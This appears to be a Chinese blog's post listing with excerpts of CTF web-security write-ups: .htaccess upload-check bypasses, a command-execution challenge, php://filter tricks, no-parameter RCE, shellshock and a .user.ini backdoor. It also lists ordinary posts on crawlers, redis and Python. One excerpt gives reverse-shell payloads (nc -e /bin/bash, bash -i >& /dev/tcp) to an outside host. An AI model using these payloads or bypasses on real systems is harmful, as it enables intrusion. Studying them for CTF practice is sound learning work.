- 博客(16)
- 收藏
- 关注
RSS订阅原创 php 文件上传.htaccess getimagesize和exif_imagetype绕过
注释符在.htaccess 中有两个注释符,或者相当于单行注释的符号\x00#XBM图片#define width 1337#define height 1337WBMP图片\x00\x00\x85\x85这两种方式都可以在文件上传中放在.htaccess中,对getimagesize和exif_imagetype进行绕过不过\x00\x00\x85\x85 只能放在文件开头位置#define width 1337#define height 1337可以放
2020-10-03 14:53:53
529
原创 一道经典的命令执行
话不多说,附上链接CTF中的命令执行绕过涉及到的代码如下<?php highlight_file(__FILE__);if ($x = @$_GET['x']){ eval(substr($x, 0, 5));}很简单的代码,将我们传入的值取前五位进行evalpayload?x=`$x`;nc -e /bin/bash ip port或者?x= `$x`;bash -i >& /dev/t
2020-10-02 18:04:25
304
原创 php://filter总结
在做ctf的题得时候总是做到文件读取的题,这里总结一下关于已知的php://filter中filter种类中的总结convert.base64-encode与convert.base64-decodestring.rot13convert.iconv.UTF-8.UTF-7(convert.iconv.FROM_ENCODING.TO_ENCODING)convert.quoted-printable-encode和convert.quoted-printable-decode...
2020-09-19 22:43:27
522
原创 linux 能读取已打开文件的内容的文件
介绍两个linux中的特殊文件,/dev/fd和/proc/pid/fd,其实是一个东西,在这两个文件中,能够查看已经打开文件的内容信息。一些ctf题会打开一些文件,然后设置一些障碍让你读取它的内容,这个时候这两个文件就派上用场root@iZ8vbheq6nu641nq05gioqZ:~# cat 3.php <?php phpinfo(); ?>root@iZ8vbheq6nu641nq05gioqZ:~# cat 1.py import osf=open('3.php')os.
2020-08-14 20:55:12
292
原创 php 序列化的字母标识
ctf比赛中经常出现php反序列化的题,所以写一篇博客来记一下php序列化中的字符标识,可能以后会有补充a:array 数组php > echo serialize(array());a:0:{}php > echo serialize(array(1,2));a:2:{i:0;i:1;i:1;i:2;}i:integer 整数php > echo serialize(14);i:14;b:boolean bool值php > echo serialize(
2020-08-14 15:04:16
1332
原创 爬虫爬取百度图片
具体分析过程就不写了,给出我学习的链接:https://blog.csdn.net/qq_35371031/article/details/81207966上代码import requestsimport osimport threadingimport urllib.parseimport timeimport reimport hashlibclass picture: """ 爬取百度图片 """ def __init__(self, picture_
2020-07-04 20:39:15
326
原创 php 正则匹配反斜杠的问题
php 正则匹配反斜杠的问题在做安洵杯 2019的easy web时碰到了php的反斜杠问题,想来研究一下,可以在buuctf上复现一下稍微修改一下源代码,方便研究$cmd = $_GET['cmd'];echo $cmd;echo "<br>";if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|
2020-06-09 16:28:19
929
原创 无参数rce
总结一下无参数rce的各种解法(为了便于自己查找,同时为了把自己收藏夹的几个相关网址删掉,每次都在别人博客找很麻烦的(手动狗头))首先准备代码<?phpif(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['a'])) { eval($_GET['a']);}利用session_idphp中有一个函数叫session_id(),可以直接获取到cookie中的phpsessionid值,phpsessionid的组成符号有
2020-06-07 19:33:11
2031
原创 ubuntu开启php的curl扩展
ubuntu下开启php的curl扩展只需要两条指令sudo apt-get install php7.2-curlsudo service apache2 restart然后尝试访问一下,访问成功<?phphighlight_file(__FILE__);if(isset($_GET['url'])){ $link=$_GET['url']; echo "url = $link"."</br>"; $curlobj=curl_init($l
2020-06-02 16:11:10
565
原创 python socket编程
先附上慕课的免费学习链接https://www.imooc.com/video/17673socket是什么Socket是电脑网络中进程间数据流的端点Socket是操作系统的通信机制应用程序通过Socket进行网络数据的传输我本人对Socket的理解就是服务端程序...
2020-05-09 17:54:41
121
原创 redis安装
redis的安装在http://download.redis.io/releases下载需要的压缩包wget http://download.redis.io/releases/redis-6.0-rc1.tar.gz将下载好的压缩包压缩包解压tar -zxvf redis-6.0-rc1.tar.gz安装gcc和tcl依赖apt-get install gcc或者yum inst...
2020-04-29 13:21:51
110
原创 php 反序列化逃逸
php反序列化逃逸前提知识PHP 在反序列化时,底层代码是以;作为字段的分隔,以}作为结尾(数组、对象等类型);反序列化时,结尾后的字符串会被忽略掉,例如:php > print_r(serialize([1]));a:1:{i:0;i:1;}php > print_r(unserialize('a:1:{i:0;i:1;}sdasda'));Array( [0]...
2020-04-28 15:40:54
738
原创 shellshock漏洞复现
复现过程用别人做好的docker进行复现docker search shellshockdocker pull hmlio/vaas-cve-2014-6271docker run -it -p 80:80 --name test hmlio/vaas-cve-2014-6271 /bin/bash进入之后先进行本地测试:root@96803784d9f2:/# test='() {...
2020-04-13 12:09:06
317
原创 python3中base64的编码问题
今天用python3来base64编码一串字符,结果和正常的base64编码结果不一样,肝了一下午终于发现问题所在(我太菜了),写下这篇文章记录一下。众所周知,python2是ascii编码,python3是默认unicode编码的,而python3用base64.b64encode()函数需要将参数转化成byte形式,而我们常用str.encode(‘utf-8’)将字符串转换成byte形式,...
2020-04-01 21:37:00
2953
1
原创 [SUCTF 2019]CheckIn .user.ini后门
今天第一次写博客,就写刚做的一道题学到的.user.ini吧。什么是.user.ini.user.ini看名字后缀就能猜到这是一个配置文件,说到配置文件,那肯定要提一提php.ini文件。php.ini文件是php的默认配置文件,其中包含了很多对php的配置信息,像我们常见的disable_functions、extension_dir等,这些配置分为四种模式这些模式决定着一个 PHP 的...
2020-03-31 19:51:12
394
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人